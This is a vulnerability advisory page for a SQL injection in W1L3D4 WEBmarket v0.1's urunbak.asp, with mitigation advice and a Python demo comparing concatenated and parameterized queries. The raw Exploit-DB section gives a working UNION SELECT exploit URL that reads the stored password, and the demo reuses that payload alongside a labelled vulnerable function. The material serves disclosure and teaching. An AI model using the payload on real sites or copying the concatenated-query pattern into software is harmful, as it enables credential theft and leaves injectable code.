Vendor: W1L3D4 WEBmarket
By: Crackers_Child
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: W1L3D4 WEBmarket
Affected Version From: v0.1
Affected Version To: v0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

W1L3D4 WEBmarket v0.1 SQL Injection Vulnerability

The vulnerability is in the urunbak.asp script of W1L3D4 WEBmarket v0.1. The 'id' parameter in the URL reaches a SQL query without validation, so an attacker can inject SQL through it and retrieve sensitive information from the database. The example exploit URL in the raw data below appends a UNION SELECT to the id value to read the parola column from the ayar table.

Mitigation:

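To mitigate this vulnerability, validate and sanitize user input before it is used in SQL queries; here the 'id' parameter should be accepted only if it is an integer. Additionally, use prepared statements or parameterized queries so that the value is passed to the database as data rather than as part of the SQL text, which prevents SQL injection attacks.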
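
The two mitigations above, applied to the id value from the exploit URL, as an added example that is not code from WEBmarket or from the advisory. It uses Python's sqlite3 as a stand-in for the ASP database layer; only the ayar table, its parola column and the seven-column result width come from the advisory, while the urun table, its columns and all row values are assumptions.

```python
import sqlite3

# Constructed stand-in database. Only `ayar`, `parola` and the 7-column width
# come from the advisory; the `urun` table and every row value are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE urun (id INTEGER PRIMARY KEY, ad TEXT, aciklama TEXT,"
               " fiyat REAL, stok INTEGER, kategori INTEGER, resim TEXT)")
    db.execute("INSERT INTO urun VALUES (1, 'Widget', 'sample item', 9.5, 3, 1, 'w.jpg')")
    db.execute("CREATE TABLE ayar (parola TEXT)")
    db.execute("INSERT INTO ayar VALUES ('constructed-admin-secret')")
    return db

def lookup_vulnerable(db, raw_id):
    # Anti-pattern: the request value is pasted into the SQL text, so anything
    # after the number is parsed as SQL.
    return db.execute("SELECT * FROM urun WHERE id = " + raw_id).fetchall()

def lookup_bound_only(db, raw_id):
    # Parameter binding alone: the whole value is compared as one string,
    # so the UNION clause is never parsed as SQL.
    return db.execute("SELECT * FROM urun WHERE id = ?", (raw_id,)).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Validate: the parameter must be a plain ASCII decimal integer.
    if not raw_id.isascii() or not raw_id.isdigit():
        raise ValueError("id must be an integer")
    # 2) Bind: the value travels as data, never as SQL text.
    return db.execute("SELECT * FROM urun WHERE id = ?", (int(raw_id),)).fetchall()

# The id value from the advisory's exploit URL, with '+' decoded to spaces.
PAYLOAD = "25 union select 0,1,parola,3,4,5,6 from ayar"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_vulnerable(db, PAYLOAD))
    print("bound only:  ", lookup_bound_only(db, PAYLOAD))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("validated:    rejected,", exc)
    print("legit id=1:  ", lookup_hardened(db, "1"))
```

Rejecting the request at validation also gives the application a point at which to log the malformed id for detection.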

Exploit-DB raw data:

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Title    : W1L3D4 WEBmarket v0,1 SQL Injection Vuln

Author   : Crackers_Child

Contact  : cybermilitan@hotmail.com

Bug      : in urunbak.asp

Down     : http://www.aspdestek.net/uploads/20070518_092540_webmarket.rar
Site     :

Exploit  : http://site.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar

Note     : [ Damn, we ended up in court, what more could happen :) (ci) ] [ cRA is off the pitch for 2 months ]

www.dosyacek.com

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 

# milw0rm.com [2007-06-20]